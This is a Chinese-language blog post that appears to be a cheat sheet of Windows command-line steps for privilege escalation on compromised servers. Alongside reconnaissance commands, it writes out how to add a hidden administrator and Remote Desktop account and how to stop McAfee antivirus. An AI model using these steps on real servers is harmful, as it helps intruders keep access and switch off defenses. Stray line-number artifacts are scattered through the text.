提权常用命令
1.运行环境
cmd 窗口中运行这些命令
2. DOS 命令
查看版本:ver
查看权限:whoami
tangyuan-pc 只是用户,这的 lizi 是管理员权限(一般电脑上的叫:Administrator)
在服务器中进行提权(以后会讲怎么提权),一般权限都是 user 的普通权限,或者是 guest (来宾)的权限
查看配置:systeminfo
我的出点问题,网上找的图,14年的,忽略这点
在这我们着重看一下处理器(几核的),多少位(32位很少了,但相对好提权,用 exp)
修补程序较少的服务器,用 exp 提权,希望很大
一般服务器 700+
查看用户:net user
查看进程:tasklist
查看正在运行的服务:tasklist /svc
主要是看着三个:serv-u MySQL mssql
查看开放的所有端口:netstat -ano
主要是看着4个:3389(终端,连接到服务器的端口) 1433(mssql) 3306(mysql) 43958(serv-u)
查询会话情况:query user
当前这个服务器中有哪些用户正在访问这个服务器
查看指定服务的路径:sc qc mssql
添加一个用户:
net user jianmei daxia.asd /add- 1
- 1
jianmei 是账号
daxia.asd 是密码
提升到管理权限:
net localgroup administrators jianmei /add- 1
- 1
添加用户并提升权限:
net user jianmei daxia.asd /add & net localgroup administrators jianmei /add- 1
- 1
查看指定用户的信息:net user jianmei
查看所有管理权限的用户:net localgroup administrators
加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add
添加用户不成功的时候会提示你,再运行这句话就好
突破最大连接数:mstsc /admin /v:192.168.1.101
最后的是服务器的 IP 地址
运行 加入远程桌面用户组时,若有人设置了会提示这个问题
删除用户:net user jianmei /del
开启TELNET服务:net start telnet
关闭麦咖啡:net stop “McAfee McShield”
查看当前目录的所有文件:dir c:\windows\
查看指定文件的内容:
type C:\windows\Debug.txt- 1
- 1
复制文件
把Debug.txt复制到C:\windows\addins\并命名为cmd.txt:
copy C:\windows\Debug.txt C:\windows\addins\cmd.txt- 1
- 2
- 3
- 1
- 2
- 3
切换目录
切换到系统根目录:cd \
切换到windows目录:cd windwos
返回上一级目录:cd ..
进入系统e盘:e:- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 1
- 2
- 3
- 4
- 5
- 6
- 7
pushed命令
如果想直接进入某个指定的目录,可使用pushd命令。
如果直接进入c:\windows\system32\目录,可执行如下命令:Pushd c:\windows\system32\- 1
- 2
- 3
- 1
- 2
- 3
创建ahackj文件夹:Md ahackj
删除ahakcj文件夹:Rd ahackj
删除网站目录下的ahackj.asp文件:
Del E:\xinyun\ahackj.aspBy:珍惜少年时博客:http://www.cnblogs.com/xishaonian/
*-------------------------------------------*
